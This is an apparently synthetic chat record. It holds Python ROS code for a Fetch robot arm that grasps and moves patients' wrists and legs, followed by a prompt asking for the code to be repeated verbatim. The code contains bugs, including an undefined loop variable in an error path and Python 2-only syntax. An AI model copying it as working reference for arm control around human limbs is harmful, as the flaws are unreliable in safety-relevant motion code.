waypoints_with_respect_to_tag.append(str(colors[i].hex))\n self._preview_traj.append(prev_pose)\n\n if i < len(waypoints) - 1:\n # calculate offset between the current point on the trajectory and the next point\n r_pos = waypoints[i].pose # current point\n r_mat = self._pose_to_transform(r_pos)\n w_mat = self._pose_to_transform(waypoints[i + 1].pose)\n offset = np.dot(np.linalg.inv(r_mat), w_mat)\n prev_pose = self._move_arm_relative(prev_pose.pose, prev_pose.header, offset=offset, preview_only=True)\n\n # publish new markers\n self._viz_markers_pub.publish(MarkerArray(markers=marker_arr))\n # record the action name\n self._preview_action_abbr = abbr\n\n return waypoints_with_respect_to_tag\n\n def highlight_waypoint(self, highlight_pose, color):\n \"\"\" Publishes a marker at the specified location. \"\"\"\n marker = Marker(type=Marker.ARROW,\n id=0,\n pose=highlight_pose.pose,\n scale=WAYPOINT_HIGHLIGHT_SCALE,\n header=highlight_pose.header,\n color=color)\n self._viz_pub.publish(marker)\n\n def edit_waypoint(self, waypoint_id, delta_x, delta_y, camera):\n \"\"\" Temporarily saves the changes to the specified waypoint, and highlights the resulting pose. \"\"\"\n # calculate the resulting pose\n new_pose = self._compute_pose_by_delta(self._preview_traj[waypoint_id], delta_x, delta_y, camera)\n # save the new pose\n self._preview_traj[waypoint_id] = new_pose\n\n # preview the new trajectory\n marker_arr = []\n # marker color gradient\n colors = list(START_COLOR.range_to(END_COLOR, len(self._preview_traj)))\n # visualize the trajectory\n for i in range(len(self._preview_traj)):\n # highlight the waypoint that is being editing\n color = WAYPOINT_HIGHLIGHT_COLOR if i == waypoint_id else ColorRGBA(colors[i].red, colors[i].green, colors[i].blue, 0.8)\n marker = Marker(type=Marker.ARROW,\n id=i,\n pose=self._preview_traj[i].pose,\n scale=TRAJ_HIGHLIGHT_SCALE,\n header=self._preview_traj[i].header,\n color=color)\n marker_arr.append(marker)\n # clear previous markers\n self._viz_markers_pub.publish(MarkerArray(markers=[]))\n # publish new markers\n self._viz_markers_pub.publish(MarkerArray(markers=marker_arr))\n\n def modify_traj_in_db(self, cancel_change=True):\n \"\"\" Overwrites the previous trajectory in database. \"\"\"\n if not cancel_change:\n self._db.delete(self._preview_action_abbr)\n self._db.add(self._preview_action_abbr, self._preview_traj)\n self._preview_action_abbr = \"\"\n self._preview_traj = []\n\n def do_action_with_abbr(self, abbr, id_num):\n \"\"\" \n Moves arm to perform the action specified by abbr, save the trajectory to database if neccessary.\n Returns true if succeed, false otherwise.\n \"\"\"\n action_result = False\n if self._prepare_action(abbr, id_num):\n action_result = self._follow_traj_step_by_step(0)\n return action_result\n\n def do_action_with_abbr_smooth(self, abbr, id_num):\n \"\"\"\n Moves arm to perform the action specified by abbr smoothly.\n Returns true if succeed, false otherwise.\n \"\"\"\n action_result = False\n if self._prepare_action(abbr, id_num):\n # calculate a smooth trajectory passing through all the waypoints and move the arm\n action_result = self._move_arm(None, trajectory_waypoint=self._preview_traj, final_state=True, seed_state=self._get_seed_state())\n if not action_result:\n # smooth action fails, do the action step by step instead\n action_result = self._follow_traj_step_by_step(0)\n return action_result\n\n def pause_action(self):\n \"\"\" Pause the current action. \"\"\"\n # self.relax_arm()\n print(self._current_waypoint_id)\n\n def continue_action(self):\n \"\"\" Continue the current action. \"\"\"\n # self.freeze_arm()\n print(self._current_waypoint_id)\n # if self._current_waypoint_id > -1:\n # # continue going to the next waypoint\n # self._follow_traj_step_by_step(self._current_waypoint_id + 1)\n\n def record_action_with_abbr(self, abbr, id_num):\n \"\"\"\n Records the pose offset named abbr relative to tag, always overwrites the previous entry (if exists).\n Returns true if succeeds, false otherwise.\n \"\"\"\n # get tag pose\n tag_pose = self._get_tag_with_id(id_num)\n if tag_pose == None:\n return False\n # get the pose to be recorded: transformation lookup\n (position, quaternion) = self._tf_lookup()\n if (position, quaternion) == (None, None):\n return False\n # get the transformation, record it\n record_pose = Pose()\n record_pose.position.x = position[0]\n record_pose.position.y = position[1]\n record_pose.position.z = position[2]\n record_pose.orientation.x = quaternion[0]\n record_pose.orientation.y = quaternion[1]\n record_pose.orientation.z = quaternion[2]\n record_pose.orientation.w = quaternion[3]\n # get the offset between the tag pose and the pose to be recorded\n t_pos = tag_pose.pose.pose\n t_mat = self._pose_to_transform(t_pos)\n w_mat = self._pose_to_transform(record_pose)\n offset = np.dot(np.linalg.inv(t_mat), w_mat)\n # add the offset to database\n self._db.add(abbr, offset)\n self._db.save()\n return True\n\n def relax_arm(self):\n \"\"\" Relax the robot arm, if the program is running on the real robot \"\"\"\n if not rospy.get_param(\"use_sim\") and not self._arm_relaxed:\n goal = QueryControllerStatesGoal()\n state = ControllerState()\n state.name = 'arm_controller/follow_joint_trajectory'\n state.state = ControllerState.STOPPED\n goal.updates.append(state)\n self._controller_client.send_goal(goal)\n self._controller_client.wait_for_result()\n self._arm_relaxed = True\n\n def freeze_arm(self):\n \"\"\" Freeze the robot arm, if the program is running on the real robot \"\"\"\n if not rospy.get_param(\"use_sim\") and self._arm_relaxed:\n goal = QueryControllerStatesGoal()\n state = ControllerState()\n state.name = 'arm_controller/follow_joint_trajectory'\n state.state = ControllerState.RUNNING\n goal.updates.append(state)\n self._controller_client.send_goal(goal)\n self._controller_client.wait_for_result()\n self._arm_relaxed = False\n\n def get_list(self):\n \"\"\" Returns a list of AR tags recognized by the robot. \"\"\"\n return self._reader.get_list()\n\n def get_db_list(self):\n \"\"\" Returns list of entries in the database. \"\"\"\n return self._db.list()\n\n def get_db_entry(self, entry):\n \"\"\" Returns values associated with the given entry in the database. \"\"\"\n return self._db.get(entry)\n\n def delete_db_entry(self, name):\n \"\"\" Delete the database entry with the given name \"\"\"\n self._db.delete(name)\n self._db.save()\n\n def web_app_request_callback(self, msg):\n \"\"\"\n Parse the request given by the wee application, and call the corresponding functions.\n \"\"\"\n request_type, request_args = msg.type, msg.args\n\n print(\"type: \" + request_type)\n print(\"args: \" + str(request_args) + \"\\n\")\n\n if request_type == \"attach\":\n return_msg = \"SAKE gripper has already attached!\"\n if not self._sake_gripper_attached:\n self._publish_server_response(msg=\"Attaching SAKE gripper...\")\n self.attach_sake_gripper()\n return_msg = \"SAKE gripper attached\"\n self._publish_server_response(status=True, msg=return_msg)\n\n elif request_type == \"remove\":\n return_msg = \"SAKE gripper has already removed!\"\n if self._sake_gripper_attached:\n self._publish_server_response(msg=\"Removing SAKE gripper...\")\n self.remove_sake_gripper()\n return_msg = \"SAKE gripper removed\"\n self._publish_server_response(status=True, msg=return_msg)\n\n elif not self._sake_gripper_attached:\n # need to attach SAKE gripper first\n self._publish_server_response(status=True, msg=\"Please attach SAKE gripper first!\")\n\n else:\n # SAKE gripper has already attached\n if request_type == \"record\":\n self._publish_server_response(msg=\"Recording the current scene...\")\n if self.update_env(update_octo=bool(request_args[0])):\n # get the list of body parts and actions\n parts = self.get_list()\n parts_info, actions_info = [], []\n if len(parts):\n for part in parts:\n if part.id in BODY_PARTS and part.id in ACTIONS:\n parts_info.append(str(part.id) + \":\" + BODY_PARTS[part.id])\n for action in ACTIONS[part.id]:\n actions_info.append(str(part.id) + \":\" + action + \":\" + ABBR[action])\n self._publish_server_response(type=\"parts\", args=parts_info)\n self._publish_server_response(type=\"actions\", status=True, args=actions_info, msg=\"Scene recorded\")\n else:\n self._publish_server_response(status=True, msg=\"Failed to record the current scene!\")\n\n elif request_type == \"prev_id\" and len(request_args) == 1:\n id_num = int(request_args[0]) # convert from string to int\n self._publish_server_response(status=True, msg=\"Previewing \" + BODY_PARTS[id_num] + \"...\")\n self.preview_body_part_with_id(id_num)\n\n elif request_type == \"prev\" and len(request_args) == 2:\n abbr, id_num = request_args[0], int(request_args[1])\n waypoints_with_respect_to_tag = self.preview_action_with_abbr(abbr, id_num)\n self._publish_server_response(type=request_type, status=True, args=waypoints_with_respect_to_tag, \n msg=\"Previewing the action with respect to body part \" + BODY_PARTS[id_num] + \"...\")\n\n elif request_type == \"highlight\" and len(request_args) == 1:\n waypoint_id = int(request_args[0])\n self.highlight_waypoint(self._preview_traj[waypoint_id], WAYPOINT_HIGHLIGHT_COLOR)\n self._publish_server_response(status=True)\n\n elif request_type == \"edit\" and len(request_args) == 4:\n waypoint_id, delta_x, delta_y, camera = int(request_args[0]), int(request_args[1]), int(request_args[2]), request_args[3]\n self.edit_waypoint(waypoint_id, delta_x, delta_y, camera)\n self._publish_server_response(status=True)\n\n elif request_type == \"save_edit\" or request_type == \"cancel_edit\":\n if request_type == \"save_edit\":\n self.modify_traj_in_db(cancel_change=False)\n else:\n self.modify_traj_in_db() # cancel all the changes\n self._publish_server_response(status=True)\n\n elif request_type == \"reset\":\n self._publish_server_response(msg=\"Resetting...\")\n self.reset()\n self._publish_server_response(status=True, msg=\"Done\")\n\n elif not self._robot_stopped: \n # moveit controller is running\n if request_type == \"go\" and len(request_args) == 1:\n self._do_position_ready = False\n id_num = int(request_args[0])\n self._publish_server_response(msg=\"Moving towards body part \" + BODY_PARTS[id_num] + \"...\")\n if self.goto_part_with_id(id_num):\n self._grasp_position_ready = True\n self._do_position_id = id_num\n self._publish_server_response(status=True, msg=\"Done, ready to grasp\")\n else:\n self._publish_server_response(status=True, msg=\"Fail to move!\")\n\n elif request_type == \"grasp\" and self._grasp_position_ready and len(request_args) == 1:\n self._publish_server_response(msg=\"Grasping...\")\n self._grasp_type = \"h_close\" if request_args[0] == \"h\" else \"s_close\"\n self.do_sake_gripper_action(self._grasp_type)\n self._grasp_position_ready = False\n self._do_position_ready = True\n self._publish_server_response(status=True, msg=\"Grasped\")\n\n elif request_type == \"relax\":\n self._publish_server_response(msg=\"Relaxing arm...\")\n self.relax_arm()\n self._publish_server_response(status=True, msg=\"Arm relaxed\")\n\n elif request_type == \"freeze\":\n self._publish_server_response(msg=\"Freezing arm...\")\n self.freeze_arm()\n self._publish_server_response(status=True, msg=\"Arm froze\")\n\n elif (request_type == \"do\" or request_type == \"do_s\") and len(request_args) > 0:\n action_abbr = request_args[0]\n return_msg = \"Action failed!\"\n if self._do_position_ready:\n # performing mode\n self._publish_server_response(msg=\"Performing \" + action_abbr + \"...\")\n result = False\n if request_type == \"do\": # step by step\n result = self.do_action_with_abbr(action_abbr, self._do_position_id)\n else: # \"do_s\": smooth\n result = self.do_action_with_abbr_smooth(action_abbr, self._do_position_id)\n if result:\n return_msg = \"Action succeeded\"\n else:\n return_msg = \"Unknown action for body part with ID: \" + str(self._do_position_id)\n # always release gripper\n self._publish_server_response(msg=\"Releasing the gripper...\")\n self.do_sake_gripper_action(\"40 \" + self._sake_gripper_effort)\n self._do_position_ready = False\n self._publish_server_response(status=True, msg=return_msg)\n\n elif request_type == \"open\":\n self._publish_server_response(msg=\"Opening the gripper...\")\n self.do_sake_gripper_action(\"open\")\n self._do_position_ready = False\n self._publish_server_response(status=True, msg=\"Gripper opened\")\n\n elif request_type == \"stop\":\n self._publish_server_response(msg=\"Stopping the robot...\")\n self.estop()\n self._publish_server_response(status=True, msg=\"Robot stopped, please \\\"RESET\\\" if you want to continue using it\")\n\n elif request_type == \"run\" and len(request_args) == 3:\n #######################################################################################\n\n\n\n\n\n ############## todo\n # start execution from the currect step in the action trajectory\n\n\n\n # start execution from the very beginning\n self.web_app_request_callback(WebAppRequest(type=\"go\", args=[request_args[0]]))\n self.web_app_request_callback(WebAppRequest(type=\"grasp\", args=[request_args[1]]))\n self.web_app_request_callback(WebAppRequest(type=\"do_s\", args=[request_args[2]]))\n self._publish_server_response(type=request_type, status=True, msg=\"DONE\")\n\n elif request_type == \"step\":\n return_msg = \"Ready!\"\n waypoint_id = int(request_args[0])\n if waypoint_id == -1: # goto tag and grasp\n self.web_app_request_callback(WebAppRequest(type=\"go\", args=[request_args[1]]))\n self.web_app_request_callback(WebAppRequest(type=\"grasp\", args=[request_args[2]]))\n else: # move along trajectory\n self._grasp_type = \"h_close\" if request_args[1] == \"h\" else \"s_close\"\n return_msg = \"Fail to reach waypoint #\" + request_args[0]\n result = self._goto_waypoint_on_traj_with_id(waypoint_id)\n if waypoint_id == len(self._preview_traj) - 1: # last point\n self._publish_server_response(msg=\"Releasing the gripper...\")\n self.do_sake_gripper_action(\"40 \" + self._sake_gripper_effort)\n self._do_position_ready = False\n if result:\n return_msg = \"Reached waypoint #\" + request_args[0]\n self._publish_server_response(type=request_type, status=True, args=[request_args[0]], msg=return_msg)\n\n elif request_type == \"pause\":\n self._publish_server_response(msg=\"Pausing...\")\n self.pause_action()\n self._publish_server_response(type=request_type, status=True, msg=\"PAUSED\")\n\n elif request_type == \"continue\":\n self._publish_server_response(msg=\"Continuing...\")\n self.continue_action()\n self._publish_server_response(type=request_type, status=True, msg=\"CONTINUED\")\n\n else: \n self._publish_server_response(status=True, msg=\"Invalid command :)\")\n\n\n def _reset_program_state(self):\n \"\"\" Resets program state. \"\"\"\n self._grasp_position_ready = False\n self._do_position_ready = False\n self._do_position_id = -1\n\n def _clear_octomap(self):\n \"\"\" Clears the octomap. Returns true if succeeds, false otherwise. \"\"\"\n rospy.wait_for_service('clear_octomap')\n try:\n clear_octo = rospy.ServiceProxy('clear_octomap', Empty)\n clear_octo()\n except rospy.ServiceException, e:\n rospy.logerr('Fail clear octomap: {}'.format(e))\n return False\n return True\n\n def _move_arm_relative(self, ref_pose, ref_header, offset=None, preview_only=False, seed_state=None):\n \"\"\" \n Calculates the coordinate of the goal by adding the offset to the given reference pose, \n and moves the arm to the goal. If it's only for previewing, returns the goal pose,\n else returns the result of the movement.\n \"\"\"\n goal_pose = PoseStamped()\n goal_pose.header = ref_header\n\n if offset is not None:\n # current pose is valid, perform action\n t_mat = self._pose_to_transform(ref_pose)\n # compute the new coordinate\n new_trans = np.dot(t_mat, offset)\n pose = self._transform_to_pose(new_trans)\n goal_pose.pose = pose\n else:\n goal_pose.pose = ref_pose\n \n if preview_only:\n return goal_pose\n else:\n # move to the goal position while avoiding unreasonable trajectories!\n # close SAKE gripper again to ensure the limb is grasped\n self.do_sake_gripper_action(self._grasp_type)\n # visualize goal pose\n self.highlight_waypoint(goal_pose, ColorRGBA(1.0, 1.0, 0.0, 0.8))\n return goal_pose if self._move_arm(goal_pose, final_state=True, seed_state=seed_state) else None\n\n def _move_arm(self, goal_pose, trajectory_waypoint=[], final_state=False, seed_state=None):\n \"\"\" \n Moves arm to the specified goal_pose. Returns true if succeed, false otherwise.\n \"\"\"\n error = None\n if not final_state:\n # simply go to the goal_pose\n error = self._arm.move_to_pose_with_seed(goal_pose, seed_state, [], **self._kwargs)\n # record the current pose because we still have the \"do action\" step to do\n self._current_pose = goal_pose\n else:\n # go to goal_pose while avoiding unreasonable trajectories!\n if trajectory_waypoint:\n # create an array of waypoints\n waypoints = []\n for tw in trajectory_waypoint:\n waypoints.append(tw.pose)\n # using trajectory waypoints to perform a smooth motion\n plan = self._arm.get_cartesian_path(self._moveit_group, seed_state, waypoints)\n if plan:\n error = self._arm.execute_trajectory(self._moveit_group, plan)\n else:\n error = 'PLANNING_FAILED'\n else:\n # using seed\n error = self._arm.move_to_pose_with_seed(goal_pose, seed_state, [], **self._kwargs)\n if error is not None:\n # planning with seed failed, try without seed \n # moveit: move group commander\n # check if the pose can be reached in a straight line motion\n plan = self._arm.straight_move_to_pose_check(self._moveit_group, goal_pose)\n if plan:\n error = self._arm.straight_move_to_pose(self._moveit_group, plan)\n else:\n error = 'PLANNING_FAILED'\n\n # reset current pose to none\n self._current_pose = None\n \n if error is not None:\n self._arm.cancel_all_goals()\n rospy.logerr(\"Fail to move: {}\".format(error))\n return False\n # succeed\n return True\n\n def _transform_to_pose(self, matrix):\n \"\"\" Matrix to pose \"\"\"\n pose = Pose()\n trans_vector = tft.translation_from_matrix(matrix)\n pose.position = Point(trans_vector[0], trans_vector[1], trans_vector[2])\n quartern = tft.quaternion_from_matrix(matrix)\n pose.orientation = Quaternion(quartern[0], quartern[1], quartern[2], quartern[3])\n return pose\n\n def _pose_to_transform(self, pose):\n \"\"\" Pose to matrix \"\"\"\n q = pose.orientation\n matrix = tft.quaternion_matrix([q.x, q.y, q.z, q.w])\n matrix[0, 3] = pose.position.x\n matrix[1, 3] = pose.position.y\n matrix[2, 3] = pose.position.z\n return matrix\n\n def _get_tag_with_id(self, id_num):\n \"\"\" Returns the AR tag with the given id, returns None if id not found \"\"\"\n tag_pose = self._reader.get_tag(id_num)\n if tag_pose == None:\n rospy.logerr(\"AR tag lookup error: Invalid ID# \" + str(id_num))\n return tag_pose\n\n def _tf_lookup(self):\n \"\"\" \n Lookups the transformation between \"base_link\" and \"wrist_roll_link\" (retry up to TRANSFROM_LOOKUP_RETRY times),\n and returns the result\n \"\"\"\n (position, quaternion) = (None, None)\n count = 0\n while True:\n if (position, quaternion) != (None, None): # lookup succeeds\n return (position, quaternion)\n elif count >= TRANSFROM_LOOKUP_RETRY: # exceeds maximum retry times\n rospy.logerr(\"Fail to lookup transfrom information between 'base_link' and 'wrist_roll_link'\")\n return (None, None)\n else: # try to lookup transform information\n try:\n (position, quaternion) = self._tf_listener.lookupTransform('base_link', 'wrist_roll_link', rospy.Time(0))\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n count += 1\n continue\n\n def _get_goto_pose(self, ar_pose):\n \"\"\"\n Calculates the grasp pose of gripper given the AR tag pose, returns the gripper pose.\n \"\"\"\n grasp_offset = self._db.get(\"GRASP\")\n goal_pose = self._move_arm_relative(ar_pose.pose.pose, ar_pose.header, offset=grasp_offset, preview_only=True)\n self.highlight_waypoint(goal_pose, WAYPOINT_HIGHLIGHT_COLOR)\n return goal_pose\n\n def _prepare_action(self, abbr, id_num):\n \"\"\"\n Previews the action trajectory, moves robot arm to the starting position of the action and\n grasps the limb. Returns true if succeeds, false otherwise.\n \"\"\"\n # preview action\n self.preview_action_with_abbr(abbr, id_num)\n # freeze arm for moveit\n self.freeze_arm()\n # get AR tag information\n tag_pose = self._get_tag_with_id(id_num)\n if tag_pose == None or self._current_pose == None:\n return False\n # move arm to the starting position relative to AR tag\n if not self._preview_traj or not self.goto_part_with_id(id_num):\n rospy.logerr(\"Fail to move to the starting position for action: \" + abbr)\n return False\n return True\n\n def _follow_traj_step_by_step(self, start_id):\n \"\"\"\n Follows the current trajectory step by step. Returns true if at least one waypoint is reached, false otherwise.\n \"\"\"\n succeed = False\n for i in range(start_id, len(self._preview_traj) - 1):\n goal_pose = self._preview_traj[i + 1]\n # move arm relative to the previous pose (use seed), skip the current waypoint if the current action fails\n action_result = self._move_arm_relative(goal_pose.pose, goal_pose.header, seed_state=self._get_seed_state())\n # record the current waypoint id\n self._current_waypoint_id = i + 1\n # check action result\n if action_result is not None:\n succeed = True # the whole action succeeds if at least one pose is reached\n else:\n rospy.logerr(\"Fail to reach waypoint \" + str(i + 1))\n # action finished, reset the current waypoint\n self._current_waypoint_id = -1\n return succeed\n\n def _goto_waypoint_on_traj_with_id(self, waypoint_id):\n \"\"\"\n Go to the specific waypoint on the trajectory. Returns true if succeeds, false otherwise.\n \"\"\"\n succeed = False\n if -1 < waypoint_id < len(self._preview_traj):\n goal_pose = self._preview_traj[waypoint_id]\n action_result = self._move_arm_relative(goal_pose.pose, goal_pose.header, seed_state=self._get_seed_state())\n if action_result is not None:\n succeed = True\n else:\n rospy.logerr(\"Fail to reach waypoint \" + str(i + 1))\n return succeed\n\n def _save_traj_to_db(self, abbr, id_num):\n \"\"\"\n Checks bag file for the trajectory with given abbr, calculate waypoints and save those points to the database.\n Returns the calculated waypoints if succeed, none otherwise.\n \"\"\"\n # check bag files for the trajectory\n bag_file_path = os.path.join(self._bag_file_dir, abbr.lower() + '.bag')\n bag = rosbag.Bag(bag_file_path)\n waypoints = []\n prev_msg = []\n # get the trajectory from bag file\n for topic, msg, t in bag.read_messages(topics=['/joint_states']):\n joint_state = list(msg.position[6:13])\n if len(joint_state) != 0 and (len(prev_msg) == 0 or np.abs(np.sum(np.subtract(joint_state, prev_msg))) > rospy.get_param(\"arm_traj_threshold\")):\n prev_msg = joint_state\n # use forward kinematics to find the wrist position\n point = self._arm.compute_fk(msg)\n if point:\n # add the result position\n waypoints.append(point[0])\n bag.close()\n\n if len(waypoints) < 2:\n # this trajectory is empty because it only contains the starting point\n rospy.logerr(\"Empty trajectory for action: \" + abbr)\n return None\n \n # add the result position to database\n self._db.add(abbr, waypoints)\n self._db.save()\n return waypoints\n\n def _publish_server_response(self, type=\"\", status=False, args=[], msg=\"\"):\n \"\"\" Publishes the server response message, and prints the message in console if needed. \"\"\"\n if rospy.get_param(\"console_output\"):\n print(msg)\n self._web_app_response_pub.publish(WebAppResponse(type=type, status=status, args=args, msg=msg))\n\n def _compute_pose_by_delta(self, current_pose, delta_x, delta_y, camera):\n \"\"\" \n Computes and returns the new pose with respect to base_link after applying \n delta_x and delta_y to the current pose in the specified camera view.\n \"\"\"\n x_distance, y_distance = dpx_to_distance(delta_x, delta_y, camera, current_pose, True)\n return delta_modified_stamped_pose(x_distance, y_distance, camera, current_pose)\n\n def _get_seed_state(self):\n \"\"\" Returns the current arm joint state as the seed used in motion planning. \"\"\"\n seed_state = JointState()\n seed_state.name = self._arm_joints.names()\n seed_state.position = self._arm_joints.values()\n return seed_state\n\n def _set_sake_gripper_action_status(self, msg):\n \"\"\" This is the callback of sake gripper status. \"\"\"\n self._sake_gripper_action_finished = True\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the code exactly as the original, including blank lines:\n<|memory_start|>```python\n#! /usr/bin/env python\n\nimport rospy\nimport math\nfrom pprint import pprint\nimport numpy as np\nimport fetch_api\nfrom std_msgs.msg import String, Header, ColorRGBA, Bool\nfrom std_srvs.srv import Empty\nfrom image_geometry import PinholeCameraModel\nimport tf\nimport tf.transformations as tft\n# from tf import TransformBroadcaster\nfrom geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3\nfrom interactive_markers.interactive_marker_server import InteractiveMarkerServer\nfrom visualization_msgs.msg import Marker, MarkerArray, InteractiveMarker, InteractiveMarkerControl, InteractiveMarkerFeedback\nfrom sensor_msgs.msg import PointCloud2, JointState\nfrom ar_track_alvar_msgs.msg import AlvarMarkers\nfrom limb_manipulation_msgs.msg import EzgripperAccess, WebAppRequest, WebAppResponse\nimport moveit_commander\nfrom moveit_python import PlanningSceneInterface\nfrom moveit_msgs.msg import OrientationConstraint\nimport subprocess\nfrom robot_controllers_msgs.msg import QueryControllerStatesAction, QueryControllerStatesGoal, ControllerState\nfrom database import Database\nimport actionlib\nimport rosbag\nimport os\nfrom colour import Color\nimport sys\nfrom shared_teleop_functions_and_vars import dpx_to_distance, delta_modified_stamped_pose\nimport copy\n\n\n# maximum times to retry if a transform lookup fails\nTRANSFROM_LOOKUP_RETRY = 10\n# colors for trajectory visualization\nSTART_COLOR = Color(\"Orange\")\nEND_COLOR = Color(\"Blue\")\nTRAJ_HIGHLIGHT_SCALE = Vector3(0.05, 0.008, 0.008)\nWAYPOINT_HIGHLIGHT_SCALE = Vector3(0.05, 0.01, 0.01) # Vector3(0.055, 0.009, 0.009)\nWAYPOINT_HIGHLIGHT_COLOR = ColorRGBA(1.0, 0.0, 0.0, 0.8)\n\n# body parts and their corresponding ID# and actions\nBODY_PARTS = {0: \"right wrist\", 1: \"lower right leg\",\n 2: \"left wrist\", 3: \"lower left leg\"}\n\nACTIONS = {0: [\"right arm elbow extension\", \"right arm elbow flexion\"],\n 1: [\"right leg abduction and adduction\"], # , \"right leg medial rotation\", \"right leg lateral rotation\"],\n 2: [\"left arm elbow extension\", \"left arm elbow flexion\"],\n 3: [\"left leg abduction and adduction\"] #, \"left leg medial rotation\", \"left leg lateral rotation\"]\n }\n\nABBR = {\"right leg abduction and adduction\": \"RLAA\",\n # \"right leg medial rotation\": \"RLMR\", \"right leg lateral rotation\": \"RLLR\",\n \"left abduction and adduction\": \"LLAA\",\n # \"left leg medial rotation\": \"LLMR\", \"left leg lateral rotation\": \"LLLR\",\n \"right arm elbow extension\": \"RAEE\", \"right arm elbow flexion\": \"RAEF\",\n \"left arm elbow extension\": \"LAEE\", \"left arm elbow flexion\": \"LAEF\"\n }\n\n# leg medial rotation, leg lateral rotation\n# shoulder flexion, shoulder abduction, shoulder adduction, shoulder medial rotation, shoulder lateral rotation, \n# forearm pronation, forearm supination, \n# knee flexion, knee extension (seems to be performed when seated?)\n\n\ndef wait_for_time():\n \"\"\"\n Wait for simulated time to begin.\n \"\"\"\n while rospy.Time().now().to_sec() == 0:\n pass\n\n\nclass ArTagReader(object):\n def __init__(self):\n self.markers = [] # list of markers (update in real time)\n self.saved_markers = [] # list of markers saved (update only if update() is called)\n\n def callback(self, msg):\n self.markers = msg.markers\n\n def update(self):\n self.saved_markers = self.markers\n\n def get_tag(self, tag):\n \"\"\" Returns the marker with id# == tag \"\"\"\n for marker in self.saved_markers:\n if marker.id == int(tag):\n result = PoseStamped()\n result.pose = marker.pose\n result.header = marker.header\n return result\n return None\n \n def get_list(self):\n \"\"\" Returns the list of saved markers \"\"\"\n return self.saved_markers\n\n\nclass PbdServer():\n \"\"\" Server for PBD \"\"\"\n\n def __init__(self):\n # controls of Fetch\n self._arm = fetch_api.Arm()\n self._arm_joints = fetch_api.ArmJoints()\n self._torso = fetch_api.Torso()\n self._head = fetch_api.Head()\n self._base = fetch_api.Base()\n self._fetch_gripper = fetch_api.Gripper()\n # status of the arm: relax or freeze\n self._arm_relaxed = False\n # transformation\n self._tf_listener = tf.TransformListener()\n rospy.sleep(0.1)\n # AR tag reader\n self._reader = ArTagReader()\n self._ar_sub = rospy.Subscriber(\"ar_pose_marker\", AlvarMarkers, callback=self._reader.callback)\n # database of actions\n self._db = Database()\n self._db.load()\n # publisher and subscriber for controls of SAKE gripper\n self._sake_gripper_pub = rospy.Publisher('/ezgripper_access', EzgripperAccess, queue_size=1)\n self._sake_gripper_sub = rospy.Subscriber('/ezgripper_access_status', EzgripperAccess, callback=self._set_sake_gripper_action_status)\n\n\n # moveit: query controller\n self._controller_client = actionlib.SimpleActionClient('/query_controller_states', QueryControllerStatesAction)\n # moveit: move group commander\n moveit_commander.roscpp_initialize(sys.argv)\n moveit_robot = moveit_commander.RobotCommander()\n self._moveit_group = moveit_commander.MoveGroupCommander('arm')\n # motion planning scene\n self._planning_scene = PlanningSceneInterface('base_link')\n self._planning_scene.clear()\n\n # visualization\n self._viz_pub = rospy.Publisher('visualization_marker', Marker, queue_size=5)\n self._viz_markers_pub = rospy.Publisher('visualization_marker_array', MarkerArray, queue_size=5)\n\n # initial position of robot arm\n self._arm_initial_poses = [\n (\"shoulder_pan_joint\", 1.296), (\"shoulder_lift_joint\", 1.480), (\"upperarm_roll_joint\", -0.904), (\"elbow_flex_joint\", 2.251), \n (\"forearm_roll_joint\", -2.021), (\"wrist_flex_joint\", -1.113), (\"wrist_roll_joint\", -0.864)]\n \n # orientation constraint (unused)\n self._gripper_oc = OrientationConstraint()\n self._gripper_oc.header.frame_id = 'base_link'\n self._gripper_oc.link_name = 'wrist_roll_link'\n self._gripper_oc.orientation.z = -0.707\n self._gripper_oc.orientation.w = 0.707\n self._gripper_oc.absolute_x_axis_tolerance = 0.1\n self._gripper_oc.absolute_y_axis_tolerance = 0.1\n self._gripper_oc.absolute_z_axis_tolerance = 3.14\n self._gripper_oc.weight = 1.0\n # moveit args\n self._kwargs = {\n 'allowed_planning_time': 30,\n 'execution_timeout': 15,\n 'group_name': 'arm',\n 'num_planning_attempts': 10,\n # 'orientation_constraint': self._gripper_oc,\n 'replan': True,\n 'replan_attempts': 5,\n 'tolerance': 0.01\n }\n\n # current pose of gripper (used in performing actions)\n self._current_pose = None\n # bag file directory\n script_path = os.path.abspath(__file__)\n self._bag_file_dir = os.path.split(script_path)[0][:-4] + '/bags'\n\n # subscriber and publisher for frontend\n self._web_app_request_sub = rospy.Subscriber(\"web_app_request\", WebAppRequest, callback=self.web_app_request_callback)\n self._web_app_response_pub = rospy.Publisher('web_app_response', WebAppResponse, queue_size=5)\n # variables representing the program state\n self._sake_gripper_attached = False\n self._sake_gripper_action_finished = False\n self._sake_gripper_effort = \"100\"\n self._robot_stopped = False\n self._grasp_position_ready = False\n self._grasp_type = \"h_close\"\n self._do_position_ready = False\n self._do_position_id = -1\n self._preview_action_abbr = \"\"\n self._preview_traj = [] # the trajectory being previewed currently\n self._current_waypoint_id = -1\n\n rospy.sleep(0.5)\n\n def setup(self):\n \"\"\" Handler for robot set up \"\"\"\n print(\"\\nSetting up everything, please wait...\\n\")\n # set robot's initial state\n self._torso.set_height(0)\n self._head.pan_tilt(0, 0.8)\n # move arm to the initial position (with collision detection)\n self._arm.move_to_joint_goal(self._arm_initial_poses, replan=True)\n\n print(\"\\nThe program is ready to use :-)\\n\")\n\n def shutdown(self):\n \"\"\" Handler for robot shutdown \"\"\"\n print(\"\\nShutting down... Bye :-)\\n\")\n # clear display\n self._viz_markers_pub.publish(MarkerArray(markers=[]))\n # moveit\n self.freeze_arm()\n self._planning_scene.clear()\n self._arm.cancel_all_goals()\n # save the database\n self._db.save()\n # moveit: move group commander\n self._moveit_group.stop()\n moveit_commander.roscpp_shutdown()\n\n def attach_sake_gripper(self):\n \"\"\"\n Attaches SAKE gripper to Fetch's gripper, and updates the planning scene.\n \"\"\"\n self.freeze_arm()\n # attach SAKE gripper to Fetch's gripper\n self._fetch_gripper.open() # make sure Fetch's gripper is open\n self._fetch_gripper.close()\n self._sake_gripper_attached = True\n\n # add SAKE gripper to the planning scene\n frame_attached_to = 'gripper_link'\n frames_okay_to_collide_with = ['gripper_link', 'l_gripper_finger_link', 'r_gripper_finger_link']\n package_path = subprocess.check_output(\"rospack find ezgripper_driver\", shell=True).replace('\\n','')\n\n if rospy.get_param(\"use_urdf\"): # use real sake gripper mesh\n # palm\n sake_palm_pose = Pose(Point(-0.01, 0, 0.05), Quaternion(-0.7, 0, 0.7, 0))\n 